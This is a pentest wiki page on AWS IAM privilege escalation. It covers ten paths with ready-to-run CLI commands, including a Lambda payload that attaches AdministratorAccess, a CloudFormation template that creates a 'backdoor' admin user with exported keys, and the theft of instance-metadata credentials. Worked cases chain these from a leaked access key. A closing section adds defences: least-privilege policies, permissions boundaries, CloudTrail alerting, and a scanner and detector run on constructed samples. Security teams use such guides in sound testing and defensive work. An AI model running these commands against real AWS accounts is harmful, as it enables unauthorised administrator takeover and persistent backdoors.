---
title: "AWS IAM Privilege Escalation"
weight: 10
date: "2026-03-09T08:58:49+08:00"
lastmod: "2026-03-09T08:58:49+08:00"
---

## Overview

IAM privilege escalation is a core skill in cloud penetration testing. By abusing IAM misconfigurations, an attacker holding a low-privilege user or role can climb to administrator-level access in the account. Every path below is, at bottom, one of three moves: rewrite a policy that already applies to you, mint credentials for a more privileged principal, or run code under a more privileged role.

**Severity**: ⭐⭐⭐⭐⭐  
**Applicable scenarios**: cloud penetration testing, lateral movement

---

## IAM basics

### Core concepts

| Term | Meaning |
|------|------|
| User | IAM user: a long-lived identity with access keys and/or a console password |
| Role | IAM role: an assumable identity that issues temporary credentials; its trust policy decides who may assume it |
| Group | A collection of users that share the policies attached to the group |
| Policy | Permission document (JSON), either managed (versioned, attachable) or inline |
| Principal | The entity making a request (user, role or AWS service) |
| Action | The API operation being authorised (e.g. s3:GetObject) |
| Resource | The target of the action, identified by ARN |

### Policy structure

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::bucket/*"
    }
  ]
}
```

---

## Reconnaissance

### Enumerate current permissions

```bash
# Who am I? (account, user/role ARN)
aws sts get-caller-identity

# Managed policies attached to the user / role, then the default version's document
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-attached-role-policies --role-name ROLENAME
aws iam get-policy --policy-arn POLICY_ARN --query Policy.DefaultVersionId
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1

# Inline policies
aws iam list-user-policies --user-name USERNAME
aws iam get-user-policy --user-name USERNAME --policy-name POLICY

# When iam:Get*/List* is denied, brute-force the effective permission set (enumerate-iam)
python3 enumerate-iam.py --access-key KEY --secret-key SECRET
```

### Automated tools

```bash
# Pacu (AWS exploitation framework): enumerate, then scan for the escalation paths below
pacu
> run iam__enum_permissions
> run iam__privesc_scan

# CloudSploit (posture scanner; needs config.js created from config_example.js)
node index.js

# ScoutSuite (posture scanner, HTML report)
python3 scout.py aws --profile PROFILE
```

---

## Common escalation paths

### 1. iam:CreatePolicyVersion

**How it works**: managed policies are versioned. If you may create a new version of a policy that is attached to your own user, group or role, write a version granting `*` on `*` and make it the default. `--set-as-default` on CreatePolicyVersion does both in one call, so `iam:SetDefaultPolicyVersion` is only needed when you have to switch versions as a separate step.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:CreatePolicyVersion",
    "iam:SetDefaultPolicyVersion"
  ],
  "Resource": "arn:aws:iam::*:policy/POLICY_NAME"
}
```

**Exploitation**:
```bash
# 0. A managed policy holds at most 5 versions; if it is full, one must be deleted first (iam:DeletePolicyVersion)
aws iam list-policy-versions --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY

# 1. Create a new version and make it the default
aws iam create-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT_ID:policy/POLICY \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }]
  }' \
  --set-as-default

# 2. Verify: your identity is unchanged, so test a call the old version did not allow
aws iam list-users
```

### 2. iam:AttachUserPolicy / iam:AttachRolePolicy

**How it works**: attach the AWS-managed AdministratorAccess policy to your own user, to a role you can assume, or (with iam:AttachGroupPolicy) to a group you belong to. The `Resource` element of your permission must cover the target principal, and a permissions boundary on that principal still caps what the attached policy grants.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:AttachUserPolicy",
    "iam:AttachRolePolicy"
  ],
  "Resource": "*"
}
```

**Exploitation**:
```bash
# Attach the admin policy to a user you control
aws iam attach-user-policy \
  --user-name TARGET_USER \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Or to a role you can assume
aws iam attach-role-policy \
  --role-name TARGET_ROLE \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```

### 3. iam:CreateAccessKey

**How it works**: create a new access key for a more privileged user and use it. Each user may hold at most two access keys, so the call fails with LimitExceeded if the target already has two; deleting one of theirs (iam:DeleteAccessKey) would break whatever uses it and is noisy.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": "iam:CreateAccessKey",
  "Resource": "arn:aws:iam::*:user/*"
}
```

**Exploitation**:
```bash
# Create a key for the admin user
aws iam create-access-key --user-name admin

# Output
{
  "AccessKey": {
    "AccessKeyId": "AKIA...",
    "SecretAccessKey": "SECRET"
  }
}

# Store the key under a new profile and confirm it works
aws configure --profile admin
aws sts get-caller-identity --profile admin
```

### 4. iam:UpdateAssumeRolePolicy + sts:AssumeRole

**How it works**: a role's trust policy decides who may assume it. If you can rewrite that policy, add your own principal and call sts:AssumeRole. The document you pass replaces the whole trust policy, so fetch the existing one first and append your statement if the role's legitimate consumers should keep working; breaking them gets the change noticed fast.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "iam:UpdateAssumeRolePolicy",
    "sts:AssumeRole"
  ],
  "Resource": "arn:aws:iam::*:role/TARGET_ROLE"
}
```

**Exploitation**:
```bash
# 0. Save the current trust policy
aws iam get-role --role-name TARGET_ROLE --query Role.AssumeRolePolicyDocument

# 1. Rewrite the trust policy
aws iam update-assume-role-policy \
  --role-name TARGET_ROLE \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ACCOUNT_ID:user/ATTACKER"},
      "Action": "sts:AssumeRole"
    }]
  }'

# 2. Assume the role (--query picks the three credential fields out of the JSON)
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_ID:role/TARGET_ROLE \
  --role-session-name attack \
  --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text

# 3. Use the temporary credentials (valid for the role's max session duration, 1 hour by default)
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
```

### 5. iam:CreateLoginProfile

**How it works**: give a user that has no console password one, then sign in to the console as them. The call fails with EntityAlreadyExists if the user already has a login profile; changing an existing password needs iam:UpdateLoginProfile instead. If the target user has an MFA device assigned, console sign-in will still require it.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": "iam:CreateLoginProfile",
  "Resource": "arn:aws:iam::*:user/*"
}
```

**Exploitation**:
```bash
# Create a console password (without a forced reset, which would demand a new password at first login)
aws iam create-login-profile \
  --user-name admin \
  --password 'P@ssw0rd123!' \
  --no-password-reset-required

# Sign in at the account's console URL (the account alias works in place of ACCOUNT_ID)
# https://ACCOUNT_ID.signin.aws.amazon.com/console
```

### 6. lambda:UpdateFunctionCode + lambda:InvokeFunction

**How it works**: a Lambda function runs with the credentials of its execution role. If you can replace the code of a function whose role is privileged and then invoke it, your code runs as that role. Check the role first; it must itself be allowed the IAM action you plan to call (iam:AttachRolePolicy below), otherwise you only get whatever that role can do.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "lambda:UpdateFunctionCode",
    "lambda:InvokeFunction"
  ],
  "Resource": "*"
}
```

**Exploitation**:
```bash
# 0. Find the execution role and the configured handler (module.function);
#    the file you upload must match the handler's module name
aws lambda get-function-configuration --function-name TARGET_FUNCTION --query '[Role,Handler]'

# 1. Write the payload (assumes the handler is exploit.lambda_handler)
cat > exploit.py << 'EOF'
import boto3

def lambda_handler(event, context):
    # boto3 picks up the execution role's temporary credentials from the
    # AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN environment variables
    iam = boto3.client('iam')
    # TARGET_ROLE: a role you can already assume (or call attach_user_policy on your own user)
    iam.attach_role_policy(
        RoleName='TARGET_ROLE',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return {'ran_as': boto3.client('sts').get_caller_identity()['Arn']}
EOF

# 2. Package
zip exploit.zip exploit.py

# 3. Replace the function code
aws lambda update-function-code \
  --function-name TARGET_FUNCTION \
  --zip-file fileb://exploit.zip

# 4. Invoke and read the result
aws lambda invoke \
  --function-name TARGET_FUNCTION \
  output.json
cat output.json
```

### 7. ec2:RunInstances + iam:PassRole

**How it works**: launch an EC2 instance with a privileged instance profile and read the role's credentials from the instance metadata service. iam:PassRole must cover the role behind that profile; in practice it is often granted on `*`.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "ec2:RunInstances",
    "iam:PassRole"
  ],
  "Resource": "*"
}
```

**Exploitation**:
```bash
# 1. Launch an instance with the admin instance profile (an existing key pair and a reachable security group are also needed)
aws ec2 run-instances \
  --image-id ami-12345678 \
  --instance-type t2.micro \
  --key-name KEY_NAME \
  --iam-instance-profile Name=ADMIN_PROFILE

# 2. SSH in
ssh -i key.pem ec2-user@INSTANCE_IP

# 3. Read the role credentials from IMDS (IMDSv2 token first; the last path element is the role name, not the profile name)
TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
```

### 8. glue:UpdateDevEndpoint / glue:CreateDevEndpoint

**How it works**: a Glue development endpoint is an EC2-backed host running with the IAM role given at creation. UpdateDevEndpoint lets you replace its SSH public key, so you can log in and use that role's credentials. CreateDevEndpoint lets you build a fresh endpoint with a role of your choosing, but that additionally needs iam:PassRole on the role.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "glue:UpdateDevEndpoint",
    "glue:CreateDevEndpoint"
  ],
  "Resource": "*"
}
```

**Exploitation**:
```bash
# 1. Generate an SSH key pair
ssh-keygen -t rsa -f glue_key

# 2. Replace the endpoint's public key with yours
aws glue update-dev-endpoint \
  --endpoint-name TARGET_ENDPOINT \
  --public-key "$(cat glue_key.pub)"

# 3. Find the endpoint address and connect (the SSH user is glue)
aws glue get-dev-endpoint --endpoint-name TARGET_ENDPOINT --query DevEndpoint.PublicAddress
ssh -i glue_key glue@ENDPOINT_ADDRESS
```

### 9. cloudformation:CreateStack + iam:PassRole

**How it works**: CloudFormation creates resources with either the caller's permissions or, when `--role-arn` is given, a service role. Passing a privileged service role (which needs iam:PassRole on it) lets a template create IAM resources you could not create yourself: here a backdoor user with an admin inline policy and an access key exported through stack outputs.

**Required permissions**:
```json
{
  "Effect": "Allow",
  "Action": [
    "cloudformation:CreateStack",
    "iam:PassRole"
  ],
  "Resource": "*"
}
```

**Exploitation**:
```bash
# 1. Write the template
cat > exploit.yaml << 'EOF'
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  BackdoorUser:
    Type: AWS::IAM::User
    Properties:
      UserName: backdoor
  BackdoorPolicy:
    Type: AWS::IAM::Policy
    Properties:
      PolicyName: AdminAccess
      PolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Action: '*'
            Resource: '*'
      Users: [!Ref BackdoorUser]
  BackdoorKey:
    Type: AWS::IAM::AccessKey
    Properties:
      UserName: !Ref BackdoorUser
Outputs:
  AccessKeyId:
    Value: !Ref BackdoorKey
  SecretAccessKey:
    Value: !GetAtt BackdoorKey.SecretAccessKey
EOF

# 2. Create the stack under the privileged service role
aws cloudformation create-stack \
  --stack-name exploit \
  --template-body file://exploit.yaml \
  --role-arn arn:aws:iam::ACCOUNT_ID:role/PRIVILEGED_CFN_ROLE \
  --capabilities CAPABILITY_NAMED_IAM

# 3. Read the backdoor credentials from the stack outputs and use them
aws cloudformation describe-stacks --stack-name exploit --query 'Stacks[0].Outputs'
aws configure --profile backdoor
```

### 10. sts:AssumeRole into an over-privileged role

**How it works**: nothing about your own permissions needs to be misconfigured. A role's trust policy names your user, your account root (in which case your identity policy must also allow sts:AssumeRole on it) or `*`, and the role carries more rights than you do.

**Discovery**:
```bash
# List every role with the principals its trust policy names; look for your user, the account root, or "*"
aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal]' --output json

# Check what a candidate role can do
aws iam list-attached-role-policies --role-name ROLE_NAME
aws iam list-role-policies --role-name ROLE_NAME
aws iam get-role-policy --role-name ROLE_NAME --policy-name POLICY
```

**Exploitation**:
```bash
# Assume the role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_ID:role/OVERPERMISSIONED_ROLE \
  --role-session-name attack

# Use the temporary credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
```
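Pacu's iam__privesc_scan performs this check against live enumeration output. The Python below, added here as an example (it is not Pacu's code and not part of the original page), does the same offline over policy documents you have already pulled with the commands in the reconnaissance section, and also covers the trust-policy check of path 10: which roles your principal can actually assume. The sample policies, trust documents, account ID and names are constructed, and `is_allowed`, `scan_privesc` and `assumable_roles` are this example's own functions.

```python
"""Offline scan of enumerated IAM policies for the escalation paths above.

Added example: not Pacu's code and not the page's own. Input is the policy
documents collected with get-user-policy / get-policy-version plus the role
list from list-roles. Every document, ARN and name below is constructed.
Condition elements are ignored, so a hit means "worth trying", not "certain".
"""
import fnmatch

# Each path lists the actions that must ALL be allowed on some resource.
ESCALATION_PATHS = {
    "CreatePolicyVersion": {"iam:CreatePolicyVersion"},
    "AttachUserPolicy": {"iam:AttachUserPolicy"},
    "AttachRolePolicy": {"iam:AttachRolePolicy"},
    "CreateAccessKey": {"iam:CreateAccessKey"},
    "CreateLoginProfile": {"iam:CreateLoginProfile"},
    "UpdateAssumeRolePolicy+AssumeRole": {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"},
    "UpdateFunctionCode+InvokeFunction": {"lambda:UpdateFunctionCode", "lambda:InvokeFunction"},
    "RunInstances+PassRole": {"ec2:RunInstances", "iam:PassRole"},
    "Glue UpdateDevEndpoint": {"glue:UpdateDevEndpoint"},
    "CloudFormation CreateStack+PassRole": {"cloudformation:CreateStack", "iam:PassRole"},
}

def _as_list(value):
    return [] if value is None else value if isinstance(value, list) else [value]

def _action_hit(stmt, action):
    # IAM action matching is case-insensitive; '*' and '?' are wildcards.
    match = lambda p: fnmatch.fnmatchcase(action.lower(), p.lower())
    if "Action" in stmt:
        return any(match(p) for p in _as_list(stmt["Action"]))
    return not any(match(p) for p in _as_list(stmt.get("NotAction")))

def _resource_hit(stmt, resource):
    patterns = _as_list(stmt.get("Resource", "*"))
    if resource is None:  # "on any resource": every Allow counts, only a blanket Deny counts
        return stmt.get("Effect") == "Allow" or "*" in patterns
    return any(fnmatch.fnmatchcase(resource, p) for p in patterns)

def is_allowed(policies, action, resource=None):
    """Evaluate `action` against the union of `policies`; an explicit Deny beats any Allow."""
    allowed = False
    for doc in policies:
        for stmt in _as_list(doc.get("Statement")):
            if not (_action_hit(stmt, action) and _resource_hit(stmt, resource)):
                continue
            if stmt.get("Effect") == "Deny":
                return False
            allowed = True
    return allowed

def scan_privesc(policies):
    """Names of the escalation paths whose required actions are all allowed."""
    return sorted(name for name, acts in ESCALATION_PATHS.items()
                  if all(is_allowed(policies, a) for a in acts))

def assumable_roles(policies, principal_arn, account_id, roles):
    """Roles the principal can assume: trusted by ARN directly (no identity policy needed),
    or trusted via the account root / '*' while its own policies allow sts:AssumeRole on the role."""
    root = f"arn:aws:iam::{account_id}:root"
    found = []
    for role in roles:
        for stmt in _as_list(role["AssumeRolePolicyDocument"].get("Statement")):
            if stmt.get("Effect") != "Allow" or not _action_hit(stmt, "sts:AssumeRole"):
                continue
            principal = stmt.get("Principal", {})
            trusted = _as_list(principal.get("AWS") if isinstance(principal, dict) else principal)
            via_account = any(p in ("*", root) for p in trusted)
            if principal_arn in trusted or (via_account and is_allowed(policies, "sts:AssumeRole", role["Arn"])):
                found.append(role["RoleName"])
                break
    return found

# Constructed sample: a developer user with one managed policy and one inline guardrail.
ACCOUNT, DEV_ARN = "123456789012", "arn:aws:iam::123456789012:user/dev"
SAMPLE_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "lambda:Get*", "lambda:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["lambda:UpdateFunctionCode", "lambda:InvokeFunction"],
         "Resource": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:*"},
        {"Effect": "Allow", "Action": ["ec2:RunInstances", "iam:PassRole", "sts:AssumeRole"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
         "Resource": f"arn:aws:iam::{ACCOUNT}:policy/DeveloperPolicy"},
    ]},
    # Inline guardrail: a blanket Deny that neutralises the RunInstances+PassRole path.
    {"Version": "2012-10-17", "Statement": [{"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"}]},
]

def _trust(principal):
    return {"Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole", "Principal": {"AWS": principal}}]}

SAMPLE_ROLES = [  # shape of `aws iam list-roles` output, constructed
    {"RoleName": "DeployRole", "Arn": f"arn:aws:iam::{ACCOUNT}:role/DeployRole",
     "AssumeRolePolicyDocument": _trust(f"arn:aws:iam::{ACCOUNT}:root")},
    {"RoleName": "AdminRole", "Arn": f"arn:aws:iam::{ACCOUNT}:role/AdminRole",
     "AssumeRolePolicyDocument": _trust(f"arn:aws:iam::{ACCOUNT}:user/alice")},
    {"RoleName": "DevRole", "Arn": f"arn:aws:iam::{ACCOUNT}:role/DevRole",
     "AssumeRolePolicyDocument": _trust(DEV_ARN)},
]
```

Running `scan_privesc(SAMPLE_POLICIES)` reports the CreatePolicyVersion and Lambda paths and nothing else: PassRole is allowed by the managed policy but the inline Deny wins, which is exactly the guardrail a defender would add. `assumable_roles` returns DeployRole (trusted via account root, and the user may call sts:AssumeRole) and DevRole (trusted by name), but not AdminRole, which trusts only alice.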

---

## Worked cases

### Case 1: developer to administrator

```bash
# 1. Initial access (leaked access key)
aws configure --profile dev
aws sts get-caller-identity --profile dev

# 2. Enumerate permissions
pacu
> set_keys   # paste the leaked key pair when prompted
> run iam__enum_permissions
> run iam__privesc_scan

# 3. Finding: iam:CreatePolicyVersion on DeveloperPolicy,
#    the managed policy attached to this very user

# 4. Create a new default version
aws iam create-policy-version \
  --policy-arn arn:aws:iam::ACCOUNT_ID:policy/DeveloperPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }]
  }' \
  --set-as-default

# 5. Confirm the new rights
aws iam list-users --profile dev  # works now
```

### Case 2: escalation from an EC2 instance role

```bash
# 1. Read the instance role's credentials from IMDS (IMDSv2 token first)
TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE

# 2. Configure the credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

# 3. Enumerate permissions (role credentials need the session token too)
python3 enumerate-iam.py --access-key "$AWS_ACCESS_KEY_ID" --secret-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN"

# 4. Finding: iam:PassRole + ec2:RunInstances

# 5. Launch a new instance with the admin instance profile
aws ec2 run-instances \
  --image-id ami-12345678 \
  --instance-type t2.micro \
  --key-name KEY_NAME \
  --iam-instance-profile Name=AdminProfile

# 6. SSH into the new instance and read the admin role's credentials from IMDS as in step 1
```

### Case 3: Lambda escalation

```bash
# 1. List Lambda functions with their execution roles
aws lambda list-functions --query 'Functions[].[FunctionName,Role]' --output table

# 2. Pick a function whose role is privileged and note its handler
aws lambda get-function-configuration --function-name TARGET --query '[Role,Handler]'

# 3. Finding: lambda:UpdateFunctionCode + lambda:InvokeFunction on that function

# 4. Payload (the file name must match the handler's module, here exploit.lambda_handler)
cat > exploit.py << 'EOF'
import boto3

def lambda_handler(event, context):
    # Runs as the function's execution role, which must be allowed iam:AttachUserPolicy
    iam = boto3.client('iam')
    iam.attach_user_policy(
        UserName='CURRENT_USER',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return 'ok'
EOF

# 5. Upload and run
zip exploit.zip exploit.py
aws lambda update-function-code --function-name TARGET --zip-file fileb://exploit.zip
aws lambda invoke --function-name TARGET output.json

# 6. Confirm
aws iam list-users  # works now
```

---

## Tools

### Pacu

```bash
# Install
pip3 install -U pacu

# Use
pacu
> set_keys   # prompts for a key alias, access key ID, secret key and optional session token
> run iam__enum_permissions
> run iam__privesc_scan
> run ec2__enum
```

### CloudSploit

```bash
# Install
git clone https://github.com/aquasecurity/cloudsploit
cd cloudsploit
npm install

# Scan (credentials come from config.js or the AWS environment variables)
cp config_example.js config.js
node index.js
```

### ScoutSuite

```bash
# Install
pip install scoutsuite

# Scan
scout aws --profile PROFILE
scout aws --access-keys --access-key-id ACCESS_KEY --secret-access-key SECRET_KEY
```

### enumerate-iam

```bash
# Install
git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
pip install -r requirements.txt

# Enumerate by calling every List*/Get*/Describe* API and recording which succeed
python3 enumerate-iam.py --access-key KEY --secret-key SECRET
python3 enumerate-iam.py --access-key KEY --secret-key SECRET --session-token TOKEN   # for role credentials
```

---

## Defensive recommendations

### Least privilege

```json
// ❌ Over-privileged
{
  "Effect": "Allow",
  "Action": "*",
  "Resource": "*"
}

// ✅ Least privilege
{
  "Effect": "Allow",
  "Action": [
    "s3:GetObject",
    "s3:PutObject"
  ],
  "Resource": "arn:aws:s3:::specific-bucket/*"
}
```

### Permissions boundaries

```bash
# Set a boundary on a user (put-role-permissions-boundary does the same for roles):
# nothing the principal attaches to itself can exceed the boundary, which blunts paths 1 and 2.
# Protect the boundary itself by denying iam:DeleteUserPermissionsBoundary and iam:PutUserPermissionsBoundary.
aws iam put-user-permissions-boundary \
  --user-name USERNAME \
  --permissions-boundary arn:aws:iam::ACCOUNT_ID:policy/PermissionsBoundary
```

### Monitoring and detection

```bash
# CloudTrail: alert on these events (CloudTrail records eventName without the service prefix)
# - CreatePolicyVersion (especially with setAsDefault=true) and SetDefaultPolicyVersion
# - AttachUserPolicy / AttachRolePolicy / PutUserPolicy / PutRolePolicy
# - CreateAccessKey / CreateLoginProfile for a user other than the caller
# - UpdateAssumeRolePolicy, followed by AssumeRole into the same role
# - PassRole in use: RunInstances, CreateStack, CreateDevEndpoint carrying an instance profile or role ARN
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreatePolicyVersion

# AWS Config: the managed rules IAM_POLICY_NO_STATEMENTS_WITH_ADMIN_ACCESS and
# IAM_USER_NO_POLICIES_CHECK flag */* policies and policies attached directly to users
```
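To turn the event list above into something that actually fires, here is a small detector over CloudTrail records, added as an example (it is not AWS's code and not part of the original page). The records are constructed to the CloudTrail JSON shape (userIdentity, eventSource, eventName, requestParameters) and are not real logs; `detect` and `_grants_everything` are this example's own functions. It goes slightly beyond the bullet list by keeping state between events so that an AssumeRole into a role whose trust policy was just rewritten is flagged, which a stateless per-event rule cannot do.

```python
"""Flag privilege-escalation activity in CloudTrail records.

Added example, not the page's own code. The records below are constructed in
the shape of CloudTrail JSON (userIdentity, eventSource, eventName,
requestParameters); they are not real logs. For real data, load each record
from `aws cloudtrail lookup-events` or a trail's S3 objects as a dict.
"""
import json

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

def _grants_everything(doc):
    """True if a policy document (JSON string or dict) allows Action '*' on Resource '*'."""
    if isinstance(doc, str):
        try:
            doc = json.loads(doc)
        except ValueError:
            return False
    stmts = doc.get("Statement", [])
    for s in stmts if isinstance(stmts, list) else [stmts]:
        acts, res = s.get("Action", []), s.get("Resource", [])
        acts = acts if isinstance(acts, list) else [acts]
        res = res if isinstance(res, list) else [res]
        if s.get("Effect") == "Allow" and "*" in acts and "*" in res:
            return True
    return False

def detect(records):
    """Return (eventName, finding) pairs for escalation-related records, in log order.
    A little state is kept so an AssumeRole into a role whose trust policy was just
    rewritten is reported too; a stateless per-event rule would miss it."""
    findings, retrusted = [], set()
    for r in records:
        name, p = r.get("eventName", ""), r.get("requestParameters") or {}
        actor = r.get("userIdentity", {}).get("arn", "?")
        me = actor.rsplit("/", 1)[-1]  # caller's user name, for the self-service check
        hit = None
        if name == "CreatePolicyVersion" and p.get("setAsDefault") and _grants_everything(p.get("policyDocument", "")):
            hit = f"{actor} made a */* version the default of {p.get('policyArn')}"
        elif name in ("AttachUserPolicy", "AttachRolePolicy") and p.get("policyArn") == ADMIN_POLICY:
            hit = f"{actor} attached AdministratorAccess to {p.get('userName') or p.get('roleName')}"
        elif name in ("CreateAccessKey", "CreateLoginProfile") and p.get("userName") not in (None, me):
            hit = f"{actor} ran {name} for another user: {p['userName']}"  # rotating one's own key is not flagged
        elif name == "UpdateAssumeRolePolicy":
            retrusted.add(p.get("roleName"))
            hit = f"{actor} rewrote the trust policy of role {p.get('roleName')}"
        elif name == "AssumeRole" and p.get("roleArn", "").rsplit("/", 1)[-1] in retrusted:
            hit = f"{actor} assumed {p['roleArn']} after changing its trust policy"
        elif name.startswith("UpdateFunctionCode"):  # CloudTrail suffixes the Lambda API version, e.g. UpdateFunctionCode20150331v2
            hit = f"{actor} replaced the code of Lambda {p.get('functionName')}"
        elif name == "RunInstances" and p.get("iamInstanceProfile"):
            hit = f"{actor} launched an instance with profile {p['iamInstanceProfile']}"
        elif name == "CreateStack" and (p.get("roleARN") or p.get("roleArn")):
            hit = f"{actor} created stack {p.get('stackName')} with a passed service role"
        if hit:
            findings.append((name, hit))
    return findings

# Constructed sample records, reduced to the fields the rules read.
_DEV = {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/dev"}
_ALICE = {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"}
_STAR = '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
_TRUST = '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:user/dev"},"Action":"sts:AssumeRole"}]}'
SAMPLE_RECORDS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion", "userIdentity": _DEV,
     "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/DeveloperPolicy",
                           "policyDocument": _STAR, "setAsDefault": True}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy", "userIdentity": _DEV,
     "requestParameters": {"userName": "backdoor", "policyArn": ADMIN_POLICY}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "userIdentity": _DEV,
     "requestParameters": {"userName": "admin"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "userIdentity": _ALICE,
     "requestParameters": {}},  # alice rotating her own key: benign
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy", "userIdentity": _DEV,
     "requestParameters": {"roleName": "DeployRole", "policyDocument": _TRUST}},
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRole", "userIdentity": _DEV,
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/DeployRole", "roleSessionName": "attack"}},
    {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity", "userIdentity": _DEV,
     "requestParameters": None},
    {"eventSource": "ec2.amazonaws.com", "eventName": "RunInstances", "userIdentity": _DEV,
     "requestParameters": {"instanceType": "t2.micro", "iamInstanceProfile": {"name": "AdminProfile"}}},
]

if __name__ == "__main__":
    for event, finding in detect(SAMPLE_RECORDS):
        print(f"[{event}] {finding}")
```

On the sample, six of the eight records are reported: alice's CreateAccessKey with no userName (her own key) and the GetCallerIdentity call are left alone. The AssumeRole rule only fires because the UpdateAssumeRolePolicy on DeployRole preceded it in the same stream; an AssumeRole into any other role is normal traffic and is not flagged.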

---

## References

- [HackTricks - AWS Privilege Escalation](https://book.hacktricks.wiki/cloud-methodology/aws-privilege-escalation)
- [Rhino Security Labs - IAM Privilege Escalation](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
- [Pacu](https://github.com/RhinoSecurityLabs/pacu)
- [AWS IAM Security](https://docs.aws.amazon.com/IAM/latest/UserGuide/security.html)
